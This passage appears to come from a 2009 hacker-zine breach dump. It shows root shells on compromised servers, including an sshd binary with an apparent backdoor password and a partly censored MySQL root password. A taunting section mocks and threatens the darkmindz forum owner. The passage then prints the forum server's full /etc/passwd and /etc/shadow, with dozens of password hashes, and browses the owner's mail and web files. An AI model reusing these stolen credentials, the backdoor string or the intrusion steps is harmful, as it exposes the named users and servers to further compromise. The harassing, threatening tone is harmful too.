590. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
591. Interrupt:217 Base address:0x2000
592.  
593. eth0:5 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
594. inet addr:64.191.36.197 Bcast:64.191.36.207 Mask:255.255.255.240
595. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
596. Interrupt:217 Base address:0x2000
597.  
598. eth0:6 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
599. inet addr:64.191.36.198 Bcast:64.191.36.207 Mask:255.255.255.240
600. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
601. Interrupt:217 Base address:0x2000
602.  
603. eth0:7 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
604. inet addr:64.191.36.199 Bcast:64.191.36.207 Mask:255.255.255.240
605. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
606. Interrupt:217 Base address:0x2000
607.  
608. eth0:8 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
609. inet addr:64.191.36.200 Bcast:64.191.36.207 Mask:255.255.255.240
610. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
611. Interrupt:217 Base address:0x2000
612.  
613. eth0:9 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
614. inet addr:64.191.36.201 Bcast:64.191.36.207 Mask:255.255.255.240
615. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
616. Interrupt:217 Base address:0x2000
617.  
618. eth0:10 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
619. inet addr:64.191.36.202 Bcast:64.191.36.207 Mask:255.255.255.240
620. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
621. Interrupt:217 Base address:0x2000
622.  
623. eth0:11 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
624. inet addr:64.191.36.203 Bcast:64.191.36.207 Mask:255.255.255.240
625. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
626. Interrupt:217 Base address:0x2000
627.  
628. eth0:12 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
629. inet addr:64.191.36.204 Bcast:64.191.36.207 Mask:255.255.255.240
630. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
631. Interrupt:217 Base address:0x2000
632.  
633. eth0:13 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
634. inet addr:64.191.36.205 Bcast:64.191.36.207 Mask:255.255.255.240
635. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
636. Interrupt:217 Base address:0x2000
637.  
638. eth0:14 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
639. inet addr:64.191.36.206 Bcast:64.191.36.207 Mask:255.255.255.240
640. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
641. Interrupt:217 Base address:0x2000
642.  
643. eth1 Link encap:Ethernet HWaddr 00:50:04:6F:DA:43
644. BROADCAST MULTICAST MTU:1500 Metric:1
645. RX packets:0 errors:0 dropped:0 overruns:0 frame:0
646. TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
647. collisions:0 txqueuelen:1000
648. RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
649. Interrupt:217 Base address:0x8000
650.  
651. lo Link encap:Local Loopback
652. inet addr:127.0.0.1 Mask:255.0.0.0
653. inet6 addr: ::1/128 Scope:Host
654. UP LOOPBACK RUNNING MTU:16436 Metric:1
655. RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
656. TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
657. collisions:0 txqueuelen:0
658. RX bytes:1453567506 (1.3 GiB) TX bytes:1453567506 (1.3 GiB)
659.  
660. sit0 Link encap:IPv6-in-IPv4
661. NOARP MTU:1480 Metric:1
662. RX packets:0 errors:0 dropped:0 overruns:0 frame:0
663. TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
664. collisions:0 txqueuelen:0
665. RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
666.  
667. root@server [/var/run]#
668.  
669.  
670. root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
671. Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
672. Rhosts authentication refused for %.100s: bad modes for %.200s
673. Server has been configured to ignore %.100s.
674. Accepted host %s ip %s client_user %s server_user %s
675. HOOKIN: %s:%s
676. DlE46Y8KpH
677. root@server [/var/run]#
678.  
679. root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
680. check_key_in_hostfiles: key %s for %s
681. auth1.c
682. sending challenge '%s'
683. ruser %.100s
684. do_authloop: BN_new failed
685. 0x3aownt
686.  
687. root@server [~]# cat .my.cnf
688. [client]
689. user="root"
690. pass=",a5.z_censored_"
691. root@server [~]#
692.  
693. root@server [/tmp]# cd /var/run/
694. root@server [/var/run]# ls
695. ./ couriersslcache dbus/ mdmpd/ pm/ saslauthd/ tailwatchd.pid
696. ../ cpanellogd.pid eximstats/ messagebus.pid pop3d.pid screen/ upcp.pid
697. acpid.socket= cpdavd.pid ftpd.sock= named/ pop3d.pid.lock sdp= utmp
698. audispd_events= cphulkd_detector.pid haldaemon.pid named.pid@ pop3d-ssl.pid setrans/ winbindd/
699. auditd.pid cphulkd_processor.pid imapd.pid netreport/ pop3d-ssl.pid.lock setroubleshoot/ wpa_supplicant/
700. autofs.fifo-misc| cphulkd.sock= imapd.pid.lock NetworkManager/ ppp/ spamd.pid
701. autofs.fifo-net| cpsrvd.pid imapd-ssl.pid nscd/ pure-authd.pid sshd.pid
702. avahi-daemon/ crond.pid imapd-ssl.pid.lock pcscd.comm= pure-ftpd/ ssh.old
703. chkservd/ cups/ klogd.pid pcscd.pid pure-ftpd.pid sudo/
704. console/ cupsd.pid mdadm/ pcscd.pub rpc.statd.pid syslogd.pid
705. root@server [/var/run]# cd screen/
706. root@server [/var/run/screen]# ls
707. ./ ../ S-root/
708. root@server [/var/run/screen]# cd S-root/
709. root@server [/var/run/screen/S-root]# ls
710. ./ ../ 13472.pts-0.server|
711. root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
712.  
713.  
714. root@server [/var/run/screen/S-root]# ls
715. ./ ../ 13472.pts-0.server|
716. root@server [/var/run/screen/S-root]# cd ..
717. root@server [/var/run/screen]# ls
718. ./ ../ S-root/
719. root@server [/var/run/screen]# ps -aux | grep -r screen
720. Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
721. root 25085 0.0 0.0 3920 700 pts/1 S+ 11:27 0:00 grep -r screen
722. root@server [/var/run/screen]# ps -aux | grep -i screen
723. Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
724. root 13472 0.0 0.0 5056 1064 ? Ss Jun10 0:00 SCREEN
725. root 25147 0.0 0.0 3920 680 pts/1 R+ 11:27 0:00 grep -i screen
726. root@server [/var/run/screen]#
727.  
728.  
729. _______ ________________
730. \ _ \ ___ __\ _ \______ \
731. / /_\ \\ \/ / /_\ \ / /
732. \ \_/ \> <\ \_/ \/ /
733. \_____ /__/\_ \\_____ /____/
734. \/ \/ \/
735. .___ __ .__ .___
736. __| _/____ _______| | __ _____ |__| ____ __| _/_______
737. / __ |\__ \\_ __ \ |/ // \| |/ \ / __ |\___ / ______
738. / /_/ | / __ \| | \/ <| Y Y \ | | \/ /_/ | / / /_____/
739. \____ |(____ /__| |__|_ \__|_| /__|___| /\____ |/_____ \
740. \/ \/ \/ \/ \/ \/ \/
741. ____________ .________
742. _________/ ____\ _ \ | ____/
743. \___ /\ __\/ /_\ \ |____ \
744. / / | | \ \_/ \/ \
745. /_____ \ |__| \_____ /______ /
746. \/ \/ \/
747.  
748.  
749. |
750. \ / _\/_
751. darkmindz .-'-. //o\ _\/_
752. -- / \ -- | /o\\
753. ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
754. We eat the night, we drink the time |
755. Make our dreams come true
756. And hungry eyes are passing by
757. On streets we call the zoo
758.  
759. Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
760. the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
761. decided to kill his site and handle because he was sloppy & cocky enough to link
762. his anti-sec activities with his public internet "life". This has spared us the
763. trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
764. We didn't want a good hax.log to go to waste so we decided to publish darkmindz
765. anyways.
766.  
767. RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
768. that, but who the fuck is/was ssanz anyway and what's the point of spreading
769. anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
770. and run some retarded haxor forum at the same time pal, good to see that you
771. realized that. But in any case if you decide to put your shitty forum online
772. again, you will be rm'ed.
773.  
774. Here's what we found in darkmindz land.
775.  
776. root@www.darkmindz.com's password:
777. Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
778. ALERT! You are entering a secured area! Your IP and login information
779. have been recorded. System administration has been notified.
780. This system is restricted to authorized access only. All activities on
781. this system are recorded and logged. Unauthorized access will be fully
782. investigated and reported to the appropriate law enforcement agencies.
783.  
784. root@server2:~[root@server2 ~]# uname -a; id
785. Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
786. 2009 x86_64 x86_64 x86_64 GNU/Linux
787. uid=0(root) gid=0(root)
788. groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
789. root@server2:~[root@server2 ~]# #who up in this mother fucker
790. root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
791. root:x:0:0:root:/root:/bin/bash
792. bin:x:1:1:bin:/bin:/sbin/nologin
793. daemon:x:2:2:daemon:/sbin:/sbin/nologin
794. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
795. halt:x:7:0:halt:/sbin:/sbin/halt
796. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
797. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
798. nobody:x:99:99:Nobody:/:/sbin/nologin
799. dbus:x:81:81:System message bus:/:/sbin/nologin
800. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
801. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
802. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
803. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
804. pcap:x:77:77::/var/arpwatch:/sbin/nologin
805. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
806. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
807. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
808. nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
809.  
810. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
811. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
812. named:x:25:25:Named:/var/named:/sbin/nologin
813. apache:x:100:500::/var/www:/bin/false
814. diradmin:x:101:101::/usr/local/directadmin:/bin/bash
815. mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
816. webapps:x:500:501::/var/www/html:/bin/bash
817. majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
818. dovecot:x:104:104::/home/dovecot:/bin/bash
819. admin:x:501:502::/home/admin:/bin/bash
820. hrdev:x:502:503::/home/hrdev:/bin/false
821. keytraderz:x:504:505::/home/keytraderz:/bin/false
822. yourkicks:x:507:508::/home/yourkicks:/bin/false
823. aaa:x:508:509::/home/aaa:/bin/false
824. beyond:x:509:510::/home/beyond:/bin/false
825. hotglow:x:510:511::/home/hotglow:/bin/false
826. wheelglow:x:512:513::/home/wheelglow:/bin/false
827. penguin:x:513:514::/home/penguin:/bin/false
828. ntp:x:38:38::/etc/ntp:/sbin/nologin
829. furiogamin:x:516:517::/home/furiogamin:/bin/false
830. kaza:x:517:518::/home/kaza:/bin/false
831. pimpinjg:x:518:519::/home/pimpinjg:/bin/false
832. dakilla:x:521:522::/home/dakilla:/bin/false
833. bootroot:x:522:523::/home/bootroot:/bin/false
834. scraft758:x:525:526::/home/scraft758:/bin/false
835. hstrike:x:526:527::/home/hstrike:/bin/false
836. romeo:x:528:529::/home/romeo:/bin/false
837. xckx:x:529:530::/home/xckx:/bin/false
838. h3mod:x:530:531::/home/h3mod:/bin/false
839. clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
840. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
841. avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
842. hbxmike:x:535:536::/home/hbxmike:/bin/false
843. wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
844. haiobr:x:537:538::/home/haiobr:/bin/false
845. odin:x:538:539::/home/odin:/bin/false
846. sam:x:539:540::/home/sam:/bin/false
847. mrgod:x:540:541::/home/mrgod:/bin/false
848. pagewiz:x:541:542::/home/pagewiz:/bin/false
849. zer0:x:542:543::/home/zer0:/bin/false
850. dablitz:x:543:544::/home/dablitz:/bin/false
851. ristop:x:544:545::/home/ristop:/bin/false
852. bloo:x:545:546::/home/bloo:/bin/false
853. root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
854. bin:*:14253:0:99999:7:::
855. daemon:*:14253:0:99999:7:::
856. shutdown:*:14253:0:99999:7:::
857. halt:*:14253:0:99999:7:::
858. mail:*:14253:0:99999:7:::
859. ftp:*:14253:0:99999:7:::
860. nobody:*:14253:0:99999:7:::
861. dbus:!!:14253:0:99999:7:::
862. nscd:!!:14253:0:99999:7:::
863. vcsa:!!:14253:0:99999:7:::
864. rpc:!!:14253:0:99999:7:::
865. sshd:!!:14253:0:99999:7:::
866. pcap:!!:14253:0:99999:7:::
867. mailnull:!!:14253:0:99999:7:::
868. smmsp:!!:14253:0:99999:7:::
869. rpcuser:!!:14253:0:99999:7:::
870. nfsnobody:!!:14253:0:99999:7:::
871. rpm:!!:14253:0:99999:7:::
872. haldaemon:!!:14253:0:99999:7:::
873. named:!!:14257::::::
874. apache:!!:14257::::::
875. diradmin:!!:14256::::::
876. mysql:!!:14256::::::
877. webapps:!!:14256:0:99999:7:::
878. majordomo:!!:14256::::::
879. dovecot:!!:14256::::::
880. admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
881. hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
882. keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
883. yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
884. aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
885. beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
886. hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
887. wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
888. penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
889. ntp:!!:14273::::::
890. furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
891. kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
892. pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
893. dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
894. bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
895. scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
896. hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
897. romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
898. xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
899. h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
900. clamav:!!:14336:0:99999:7:::
901. avahi:!!:14336::::::
902. avahi-autoipd:!!:14336::::::
903. hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
904. wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
905. haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
906. odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
907. sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
908. mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
909. pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
910. zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
911. dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
912. ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
913. bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
914. root@server2:~[root@server2 ~]# grep romeo /etc/shadow
915. romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
916. root@server2:~[root@server2 ~]# w
917. 04:05:41 up 18:48, 1 user, load average: 0.34, 0.34, 0.23
918. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
919. root pts/0 cpe-76-1x5-xx-xx 03:39 26:24 0.00s 0.00s -bash
920. root@server2:~[root@server2 ~]# ls -al
921. total 30488
922. drwxr-x--- 11 root root 4096 May 23 02:47 .
923. drwx--x--x 25 root root 4096 May 22 09:26 ..
924. -rw------- 1 root root 1132 Mar 11 01:44 anaconda-ks.cfg
925. -rw-r--r-- 1 root root 0 May 20 17:26 authorized_keys2
926. -rwxr-xr-x 1 root root 10 May 23 03:02 .bash_history
927. -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
928. -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
929. -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
930. drwxrwxrwx 24 1000 1000 4096 Apr 28 14:55 clamav-0.95.1
931. -rw-r--r-- 1 root root 24260964 Apr 8 08:24 clamav-0.95.1.tar.gz
932. -rw-r--r-- 1 root root 171053 May 22 13:49 cleaned_shells_php.txt
933. drwxr-xr-x 4 root root 4096 Mar 18 00:50 .cpan
934. -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
935. -rw-r--r-- 1 root root 4 Jan 12 16:21 .custombuild
936. -rwxr-xr-x 1 root root 21171 Jan 13 14:13 da.cpanel.import.pl
937. -rw-r--r-- 1 root root 288 Mar 31 05:21 defaults.conf
938. drwxr-xr-x 2 root root 4096 Mar 23 19:03 export
939. -rw-r--r-- 1 root root 1155 May 15 22:15 f.c
940. drwxr-xr-x 3 root root 4096 May 12 20:35 forum
941. -rw-r--r-- 1 root root 265 May 14 15:19 ifconfig
942. drwxr-xr-x 2 root root 4096 Mar 23 19:03 import
943. -rw------- 1 root root 12288 Mar 27 04:26 .import.swp
944. -rw-r--r-- 1 root root 1724 Apr 1 18:53 initsec
945. -rw------- 1 root root 97 May 23 04:02 .lesshst
946. -rw-r--r-- 1 root root 27 May 23 02:35 load
947. -rw------- 1 root root 42 Feb 5 17:18 .my.cnf
948. -rw------- 1 root root 37 May 2 15:19 .mysql_history
949. -rw-r--r-- 1 root root 9 Mar 31 05:21 .mytop
950. drwxr-xr-x 16 webapps apache 4096 Apr 28 16:11 nmap-4.85BETA8
951. -rw-r--r-- 1 root root 6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
952. drwxr-xr-x 3 root root 4096 May 20 14:31 qurantine
953. -rw------- 1 root root 1024 Apr 2 18:01 .rnd
954. -rwxr-xr-x 1 root root 2024 Apr 28 14:44 scan.pl
955. drwx------ 2 root root 4096 May 20 15:00 .ssh
956. -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
957. -rw------- 1 root root 12288 May 23 03:02 .test.swp
958. drwxr-xr-x 2 root root 4096 May 14 14:00 tmp
959. -rwxr-xr-x 1 root root 47429 May 16 2008 tuning-primer.sh
960. root@server2:~[root@server2 ~]# cat .bash_history
961. exit
962. exit
963. root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
964. root@server2:~[root@server2 ~]# date
965. Sat May 23 04:06:57 PDT 2009
966. root@server2:~[root@server2 ~]# cd /home/romeo/
967. root@server2:/home/romeo[root@server2 romeo]# ls -al
968. total 44
969. drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 .
970. drwx--x--x 36 root root 4096 May 23 02:33 ..
971. drwx------ 2 romeo romeo 4096 Feb 17 16:07 backups
972. -rw-r--r-- 1 romeo romeo 33 Dec 22 09:57 .bash_logout
973. -rw-r--r-- 1 romeo romeo 176 Dec 22 09:57 .bash_profile
974. -rw-r--r-- 1 romeo romeo 124 Dec 22 09:57 .bashrc
975. -rw------- 1 romeo romeo 0 Feb 8 08:45 .clipboard.txt
976. drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 domains
977. drwxrwx--- 4 romeo mail 4096 Feb 17 16:07 imap
978. drwxrwx--- 5 romeo mail 4096 Dec 23 08:29 Maildir
979. lrwxrwxrwx 1 romeo romeo 35 Feb 17 16:07 public_html ->
980. ./domains/darkmindz.com/public_html
981. -rw-r----- 1 romeo mail 34 Apr 19 16:26 .shadow
982. root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
983. 4.0K Maildir/tmp
984. 68M Maildir/new
985. 4.0K Maildir/cur
986. 68M Maildir/
987. 68M total
988. root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
989. root@server2:/home/romeo[root@server2 romeo]# cd domains
990. root@server2:/home/romeo/domains[root@server2 domains]# ls -la
991. total 16
992. drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
993. drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
994. drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
995. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
996. root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
997. root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
998. -la
999. total 40
1000. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 .
1001. drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 ..
1002. drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 .htpasswd
1003. drwxr-xr-x 2 root root 4096 May 23 00:10 logs
1004. drwx--x--x 3 romeo romeo 4096 Dec 22 09:57 public_ftp
1005. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 public_html
1006. drwxr-xr-x 2 root root 4096 May 1 00:10 stats
1007. -rw-r--r-- 1 romeo romeo 12151 Feb 9 09:01 view_topic.php
1008. root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
1009. public_html/
1010. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1011. public_html]# ls -al
1012. total 47264
1013. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
1014. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
1015. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
1016. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
1017. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
1018. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
1019. -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
1020. -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
1021. -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
1022. -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
1023. drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
1024. drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
1025. drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
1026. -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
1027. -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
1028. -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
1029. drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
1030. -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
1031. -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
1032. -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
1033. -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
1034. -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
1035. -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
1036. -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
1037. -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
1038. drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
1039. drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
1040. -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
1041. -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
1042. drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
1043. -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
1044. -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
1045. -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
1046. -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
1047. -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
1048. drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
1049. -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
1050. -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
1051. -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
1052. -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
1053. -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
1054. -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
1055. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
1056. -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
1057. -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
1058. drwxr-xr-x 2 root root 4096 May 20 14:30 shell
1059. -rw-r--r-- 1 romeo romeo 46487316 May 23 04:07 stress_test.txt
1060. -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
1061. drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
1062. -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
1063. drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
1064. -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
1065. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
1066. -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
1067. -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
1068. -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
1069. -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
1070. -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
1071. -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
1072. -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
1073. root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
1074. public_html]# ls -la scripts/
1075. total 476
1076. drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 .
1077. drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
1078. -rw-r--r-- 1 romeo romeo 4770 Jan 13 12:11 builder.js
1079. -rw-r--r-- 1 romeo romeo 588 Jan 13 12:11 cli.js
1080. -rw-r--r-- 1 romeo romeo 35851 Jan 13 12:12 controls.js
1081. -rw-r--r-- 1 romeo romeo 35253 Jan 13 12:11 dragdrop.js
1082. -rw-r--r-- 1 romeo romeo 38986 Jan 13 12:12 effects.js
1083. -rw-r--r-- 1 romeo romeo 8663 Feb 14 12:40 functions.js
1084. -rw-r--r-- 1 romeo romeo 6897 Jan 13 12:11 growl.js
1085. -rw-r--r-- 1 romeo romeo 63854 Jan 13 12:11 lightwindow.js
1086. -rw-r--r-- 1 romeo romeo 52665 Jan 13 12:12 php.min.js
1087. -rw-r--r-- 1 romeo romeo 1457 Jan 13 12:11 pm.js
1088. -rw-r--r-- 1 romeo romeo 1637 Jan 13 12:11 pngfix.js
1089. -rw-r--r-- 1 romeo romeo 3261 Jan 13 12:11 proto.menu.js
1090. -rw-r--r-- 1 romeo romeo 130380 Jan 13 12:12 prototype.js
1091. -rw-r--r-- 1 romeo romeo 2733 Jan 13 12:11 register.js
